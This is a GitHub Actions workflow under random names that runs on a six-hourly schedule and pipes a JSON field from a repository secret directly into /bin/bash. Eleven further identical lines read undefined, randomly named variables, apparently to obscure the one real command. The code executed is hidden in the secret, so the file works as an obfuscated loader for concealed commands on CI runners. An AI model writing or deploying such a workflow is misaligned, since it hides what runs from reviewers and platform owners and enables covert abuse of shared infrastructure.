name: duyunahen
on:
  workflow_dispatch:
  schedule:
    - cron: '11 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duyunahen
        env:
          a4301: ${{ secrets.a4301 }}
        run: |
          echo $a4301 | jq -r .fqq380 | /bin/bash
          echo $vhap7814 | jq -r .ybrl4 | /bin/bash
          echo $syau541 | jq -r .b94 | /bin/bash
          echo $bod88 | jq -r .qz7 | /bin/bash
          echo $wbgvt87691 | jq -r .zyyy1045 | /bin/bash
          echo $awmgx6 | jq -r .r4 | /bin/bash
          echo $goaue47 | jq -r .jj7 | /bin/bash
          echo $zk4845 | jq -r .p77555 | /bin/bash
          echo $qguww539 | jq -r .cfgfw50 | /bin/bash
          echo $vwr9 | jq -r .zph55113 | /bin/bash
          echo $ec87 | jq -r .rhwju72466 | /bin/bash
          echo $lucy827 | jq -r .sw08 | /bin/bash

